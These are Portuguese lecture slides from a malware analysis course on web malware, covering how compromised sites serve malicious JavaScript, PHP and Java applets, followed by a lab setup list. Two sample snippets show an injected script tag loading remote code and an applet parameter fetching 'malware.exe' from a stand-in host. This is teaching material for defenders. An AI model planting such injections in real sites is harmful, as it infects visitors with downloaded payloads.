Académique Documents
Professionnel Documents
Culture Documents
Análise de Malwares
Instrutor: Ronaldo Pinheiro de Lima
ronaldoplima@yahoo.com.br
1 Aula 20
Aula 20
12. Trabalhando com Web Malware
12.1. JavaScript
12.2. PHP
2 Aula 20
Web Malware
tecnologia web utilizada maliciosamente
web site é eficiente para armazenar e distribuir malwares
invadir grandes portais e sites de muito acesso
explora vulnerabilidade e alter o código-fonte do site
todos os visitantes podem se infectarem
tecnologias: JavaScript, PHP, Applet Java, Flash com Action Script
ofuscação de código, complexa ou não
criam vários hops (saltos) até o código principal
tudo junto e ofuscado!
3 Aula 20
JavaScript
linguagem client-side
script JS é inserido no index do site invadido
executado automaticamente quando acessado
<script src="http://www.qualquersite.com/scriptname.js"></script>
5 Aula 20
Applet Java
mini programa Java embutido no HTML
<applet code=”AppletJava.class” archive=”Arquivos.jar”>
<param name=”mensagem” value=”Hello World!”>
<param name=”malware” value=”http://www.infected.com/malware.exe”>
</applet>
7 Aula 20
Lab 12-01
Análise de web malware diversos
Material necessário:
Máquina virtual com Windows XP 32-bit
XAMMP usb lite (Apache e PHP)
(http://www.apachefriends.org/download.php?xampp-win32-1.7.7-usb-lite.exe)
Firefox + Add-on JavaScript Deobfuscator
(https://addons.mozilla.org/firefox/downloads/latest/10345/addon-10345-latest.xpi)
Acesso à Internet na VM
Arquivo: Lab-12-01.rar
(http://www.4shared.com/rar/HtZjgOwT/Lab-12-01.html)
8 Aula 20
Obrigado!
9 Aula 20